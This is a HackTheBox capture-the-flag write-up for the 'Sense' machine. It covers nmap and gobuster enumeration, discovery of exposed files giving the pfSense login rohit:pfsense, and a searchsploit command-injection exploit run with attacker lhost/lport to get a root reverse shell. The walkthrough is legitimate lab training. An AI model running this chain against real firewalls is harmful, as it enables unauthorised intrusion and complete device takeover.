HacktheBox - Sense Writeup

09/12/2019

Zero to OSCP Hero Writeup #17 - Sense

Reconnaissance

1. Nmap Scan - Common Ports TCP Scan

Let's start with a TCP scan of the target ip address to determine which common ports are open and which services are running on those ports:

nmap -sC -sV -oA nmap/initial.tcp 10.10.10.60

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -oA: Output the result of the scan in all formats as nmap/initial.tcp

From the scan we can see that there is only ports 80 and 443 open, with all traffic redirected from port 80 HTTP to HTTPS on port 443. 

2. Nmap Scan - All TCP Ports Scan

Okay, lets scan the entire TCP port range to confirm that there are no other ports open:

nmap -sC -sV -p- -oA nmap/full.tcp 10.10.10.60

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp

The full TCP scan confirmed that there are no additional ports open.

3. Nmap Scan - All UDP Ports Scan

We can do the same full port scan, but with the UDP ports:

nmap -sU -p- -oA nmap/full.udp 10.10.10.60

  • -sU: Run the scan against UDP ports
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp

The full UDP scan confirmed that there are no additional ports open.

Enumerating Port 80/443 

1. Browse to https://10.10.10.60

So when we browse to 10.10.10.60 on port 80, we are redirected to port 443 and as suspected by the name of the box, we are at a pfSense firewall login page

1.1 Trying Default Credentials 

After a quick google, i found that the defaulyt pfSense credentials are admin:pfsense, but these didnt work along with other basic combinations. 

2. Gobuster 

Lets run a gobuster scan on the target to see if there any hidden directories/files 

gobuster dir -k -u https://10.10.10.60 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt

  • dir: Search for directories 
  • -k: Dismiss any X509 certificate warnings 
  • -u: URL to scan
  • -w: Wordlist to use against the target 
  • -x: File Extensions to search for 

Okay, so Gobuster has found two interesting files; changelog.txt and system-users.txt: 

So it seems then that the pfSense firewall is out of date and is vulnerable to a known exploit of some kind but to exploit the firewall, we need to determine the firewall version.                       

And we now have a valid logon! As we can see, the username is Rohit and the password is 'Company Defaults' which is pfSense. 

3. Login to Firewall 

After logging in with the creds rohit:pfsense we find ourselves at the firewall dashboard. 

And as you can see, it gives us the key piece of information we require to find the exploit for the firewall: 

4. Searchsploit 

Lets see what searchsploit can find when we search for pfsense vulnerabilities:

searchsploit pfsense

A couple exploits stick out as possibilities, as they allow us to run commands which may allow us to get a foothold on the machine, lets take a look at the exploit that affects our version first, <2.1.4 Command Injection.

Foothold + Priv Esc - User + Root

5. pfSense <2.1.4 - status_rrd_graph_imp.php Command Injection

Lets take a closer look at the exploit and see what we need to do to use it!

5.1 Mirror the exploit to our working dir 

searchsploit -m exploits/php/webapps/43560.py

5.2 View the exploit script 

nano 43560.py 

Okay, so we now know that this exploit will execute a reverse shell! 

Lets see the flags needed to use the exploit: 

5.3 Execute the exploit 

As we already have the information needed to run the exploit, our exploit command should work:

python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.59 --lport 9001 --username rohit --password pfsense

WooHoo! We are on the machine as Root! :) 

6. Gather User and Root flags 

As we are root, we can grab both the user and root.txt flags! :) 

user.txt:

root.txt:

Conclusion

A rather simple box that highlights the importance of enumerating hidden files and directories! 

Thanks for reading, Next up is Box #18 - Silo!